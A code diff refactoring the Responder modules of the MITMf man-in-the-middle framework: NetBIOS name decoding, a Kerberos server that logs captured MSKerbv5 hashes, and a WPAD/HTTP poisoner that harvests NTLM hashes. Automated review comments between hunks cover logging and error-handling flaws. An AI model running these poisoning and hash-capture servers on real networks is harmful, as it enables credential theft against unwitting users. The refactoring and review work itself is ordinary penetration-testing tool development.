diff --git a/core/responder/fingerprinter/LANFingerprinter.py b/core/responder/fingerprinter/LANFingerprinter.py
index a1186f8..aa0c9e1 100644
--- a/core/responder/fingerprinter/LANFingerprinter.py
+++ b/core/responder/fingerprinter/LANFingerprinter.py
@@ -3,9 +3,9 @@ import socket import threading import struct import logging +import string from SocketServer import UDPServer, ThreadingMixIn, BaseRequestHandler -from core.configwatcher import ConfigWatcher from core.responder.fingerprinter.RAPLANMANPackets import * mitmf_logger = logging.getLogger("mitmf")
@@ -60,6 +60,20 @@ def NBT_NS_Role(data): else: return "Service not known." +def Decode_Name(nbname): + #From http://code.google.com/p/dpkt/ with author's permission. + try: + if len(nbname) != 32: + return nbname + l = [] + for i in range(0, 32, 2): + l.append(chr(((ord(nbname[i]) - 0x41) << 4) | + ((ord(nbname[i+1]) - 0x41) & 0xf))) + return filter(lambda x: x in string.printable, ''.join(l).split('\x00', 1)[0].replace(' ', '')) + except Exception, e: + mitmf_logger.debug("[LANFingerprinter] Error parsing NetBIOS name: {}".format(e)) + return "Illegal NetBIOS name" + def WorkstationFingerPrint(data): Role = { "\x04\x00" :"Windows 95",
diff --git a/core/protocols/kerberos/KERBServer.py b/core/responder/kerberos/KERBServer.py
similarity index 75%
rename from core/protocols/kerberos/KERBServer.py
rename to core/responder/kerberos/KERBServer.py
index 40b509f..7b6e6cf 100644
--- a/core/protocols/kerberos/KERBServer.py
+++ b/core/responder/kerberos/KERBServer.py 
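Review bot: The printable filter on the `return filter(...)` line of the new `Decode_Name` still admits control characters, because `string.printable` includes `string.whitespace` (tab, newline, carriage return, vertical tab, form feed), so a name decoded from an untrusted NBT-NS packet can carry line breaks into whatever log line it later lands on; `filter(lambda x: x in string.printable and x not in string.whitespace, ''.join(l).split('\x00', 1)[0].replace(' ', ''))` keeps letters, digits and punctuation only. The same function body, with the same filter, is duplicated verbatim in NBTNSPoisoner.py (the `@@ -105,7 +106,8 @@` hunk below); one shared helper would keep the two copies in step. The `"Illegal NetBIOS name"` sentinel is an ordinary string, so a caller cannot distinguish a decode failure from a host that actually carries that name; returning `None` on failure would be unambiguous. Catching `Exception` around the whole loop also hides which input byte caused a `chr()` ValueError, which the debug message only partly recovers.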
@@ -1,35 +1,37 @@ -################################################################################## -#Kerberos Server stuff starts here -################################################################################## + +import socket +import threading +import struct +import logging + +from SocketServer import UDPServer, TCPServer, ThreadingMixIn, BaseRequestHandler + +mitmf_logger = logging.getLogger("mitmf") class KERBServer(): - def serve_thread_udp(host, port, handler): + def serve_thread_udp(self, host, port, handler): try: server = ThreadingUDPServer((host, port), handler) server.serve_forever() except Exception, e: - print "Error starting UDP server on port %s: %s:" % (str(port),str(e)) + mitmf_logger.debug("[KERBServer] Error starting UDP server on port 88: {}:".format(e)) - def serve_thread_tcp(host, port, handler): + def serve_thread_tcp(self, host, port, handler): try: server = ThreadingTCPServer((host, port), handler) server.serve_forever() except Exception, e: - print "Error starting TCP server on port %s: %s:" % (str(port),str(e)) + mitmf_logger.debug("[KERBServer] Error starting TCP server on port 88: {}:".format(e)) #Function name self-explanatory - def start(Krb_On_Off): - if Krb_On_Off == "ON": - t1 = threading.Thread(name="KerbUDP", target=serve_thread_udp, args=("0.0.0.0", 88,KerbUDP)) - t2 = threading.Thread(name="KerbTCP", target=serve_thread_tcp, args=("0.0.0.0", 88, KerbTCP)) - for t in [t1,t2]: - t.setDaemon(True) - t.start() - - return t1, t2 - if Krb_On_Off == "OFF": - return False + def start(self): + mitmf_logger.debug("[KERBServer] online") + t1 = threading.Thread(name="KERBServerUDP", target=self.serve_thread_udp, args=("0.0.0.0", 88,KerbUDP)) + t2 = threading.Thread(name="KERBServerTCP", target=self.serve_thread_tcp, args=("0.0.0.0", 88, KerbTCP)) + for t in [t1,t2]: + t.setDaemon(True) + t.start() class ThreadingUDPServer(ThreadingMixIn, UDPServer): 
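Review bot: The new error messages in `serve_thread_udp` and `serve_thread_tcp` hard-code `port 88` even though both methods take `port` as a parameter (the removed `print` used `str(port)`), and they are logged at debug level, so a bind failure on 88 — the one failure a user of `start()` most needs to see — is invisible at default verbosity; suggest `mitmf_logger.error("[KERBServer] Error starting UDP server on port {}: {}".format(port, e))` and the TCP twin, which also drops the stray trailing colon. `start()` no longer returns the two threads the old version handed back, so any caller that joined or inspected them needs adjusting; the callers are not visible from here. `[KERBServer] online` is also logged before either thread has bound its socket, so the message appears even when both binds fail.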
@@ -45,6 +47,28 @@ class ThreadingTCPServer(ThreadingMixIn, TCPServer): def server_bind(self): TCPServer.server_bind(self) +class KerbTCP(BaseRequestHandler): + + def handle(self): + try: + data = self.request.recv(1024) + KerbHash = ParseMSKerbv5TCP(data) + if KerbHash: + mitmf_logger.info('[KERBServer] MSKerbv5 complete hash is: {}'.format(KerbHash)) + except Exception: + raise + +class KerbUDP(BaseRequestHandler): + + def handle(self): + try: + data, soc = self.request + KerbHash = ParseMSKerbv5UDP(data) + if KerbHash: + mitmf_logger.info('[KERBServer] MSKerbv5 complete hash is: {}'.format(KerbHash)) + except Exception: + raise + def ParseMSKerbv5TCP(Data): MsgType = Data[21:22] EncType = Data[43:44]
@@ -131,33 +155,3 @@ def ParseMSKerbv5UDP(Data): return BuildHash else: return False - -class KerbTCP(BaseRequestHandler): - - def handle(self): - try: - data = self.request.recv(1024) - KerbHash = ParseMSKerbv5TCP(data) - if KerbHash: - Outfile = "./logs/responder/MSKerberos-Client-"+self.client_address[0]+".txt" - WriteData(Outfile,KerbHash, KerbHash) - responder_logger.info('[+]MSKerbv5 complete hash is :%s'%(KerbHash)) - except Exception: - raise - -class KerbUDP(BaseRequestHandler): - - def handle(self): - try: - data, soc = self.request - KerbHash = ParseMSKerbv5UDP(data) - if KerbHash: - Outfile = "./logs/responder/MSKerberos-Client-"+self.client_address[0]+".txt" - WriteData(Outfile,KerbHash, KerbHash) - responder_logger.info('[+]MSKerbv5 complete hash is :%s'%(KerbHash)) - except Exception: - raise - -################################################################################## -#Kerberos Server stuff ends here -##################################################################################
\ No newline at end of file
diff --git a/core/protocols/kerberos/__init__.py b/core/responder/kerberos/__init__.py
similarity index 100%
rename from core/protocols/kerberos/__init__.py
rename to core/responder/kerberos/__init__.py 
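Review bot: The `try: ... except Exception: raise` in both `KerbTCP.handle` and `KerbUDP.handle` is a no-op — re-raising unchanged is exactly what happens with no handler — so anything `ParseMSKerbv5TCP`/`ParseMSKerbv5UDP` raise on a short or malformed packet propagates into SocketServer's default `handle_error`, which prints a traceback to stderr instead of going through `mitmf_logger`. Either drop the try/except or change the clause to `except Exception, e:` with `mitmf_logger.debug("[KERBServer] Error parsing Kerberos packet from {}: {}".format(self.client_address[0], e))` in place of `raise`. In `KerbTCP.handle` a single `recv(1024)` may return only part of a Kerberos-over-TCP message, so the fixed-offset parse (`Data[21:22]`, `Data[43:44]`) can run on a truncated buffer; whether that yields a wrong hash or just `False` depends on `ParseMSKerbv5TCP`, whose body continues past this hunk.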
diff --git a/core/responder/nbtns/NBTNSPoisoner.py b/core/responder/nbtns/NBTNSPoisoner.py
index f67160f..4563c52 100644
--- a/core/responder/nbtns/NBTNSPoisoner.py
+++ b/core/responder/nbtns/NBTNSPoisoner.py
@@ -4,6 +4,7 @@ import threading import socket import struct import logging +import string from SocketServer import UDPServer, ThreadingMixIn, BaseRequestHandler from core.configwatcher import ConfigWatcher
@@ -105,7 +106,8 @@ def Decode_Name(nbname): l.append(chr(((ord(nbname[i]) - 0x41) << 4) | ((ord(nbname[i+1]) - 0x41) & 0xf))) return filter(lambda x: x in string.printable, ''.join(l).split('\x00', 1)[0].replace(' ', '')) - except: + except Exception, e: + mitmf_logger.debug("[NBTNSPoisoner] Error parsing NetBIOS name: {}".format(e)) return "Illegal NetBIOS name" # NBT_NS Server class.
diff --git a/core/responder/wpad/WPADPoisoner.py b/core/responder/wpad/WPADPoisoner.py
index a1bd1ef..7aa23f6 100644
--- a/core/responder/wpad/WPADPoisoner.py
+++ b/core/responder/wpad/WPADPoisoner.py
@@ -2,15 +2,17 @@ import socket import threading import logging -from HTTPPackets import * from SocketServer import TCPServer, ThreadingMixIn, BaseRequestHandler +from core.configwatcher import ConfigWatcher +from HTTPPackets import * mitmf_logger = logging.getLogger("mitmf") class WPADPoisoner(): - def start(on_off): + def start(self): try: + mitmf_logger.debug("[WPADPoisoner] online") server = ThreadingTCPServer(("0.0.0.0", 80), HTTP) t = threading.Thread(name="HTTP", target=server.serve_forever) t.setDaemon(True) 
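Review bot: In `WPADPoisoner.start`, `[WPADPoisoner] online` is logged before `ThreadingTCPServer(("0.0.0.0", 80), HTTP)` is constructed, so the message appears even when binding port 80 fails and the except clause (outside this hunk) takes over; moving the debug call after the `server = ...` line, or after `t.start()`, makes it truthful. The reordered imports now put `from HTTPPackets import *` after `from core.configwatcher import ConfigWatcher`, so any name the wildcard brings in silently shadows the earlier import; naming the symbols used from HTTPPackets explicitly would avoid that, and this hunk does not show whether ConfigWatcher is used in the file at all. `start`'s body continues outside the hunk.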
@@ -25,6 +27,27 @@ class ThreadingTCPServer(ThreadingMixIn, TCPServer): def server_bind(self): TCPServer.server_bind(self) +#HTTP Server Class +class HTTP(BaseRequestHandler): + + def handle(self): + try: + while True: + self.request.settimeout(1) + data = self.request.recv(8092) + buff = WpadCustom(data,self.client_address[0]) + if buff and WpadForcedAuth(Force_WPAD_Auth) == False: + Message = "[+]WPAD (no auth) file sent to: %s"%(self.client_address[0]) + if Verbose: + print Message + mitmf_logger.info(Message) + self.request.send(buff) + else: + buffer0 = PacketSequence(data,self.client_address[0]) + self.request.send(buffer0) + except Exception: + pass#No need to be verbose.. + #Parse NTLMv1/v2 hash. def ParseHTTPHash(data,client): LMhashLen = struct.unpack('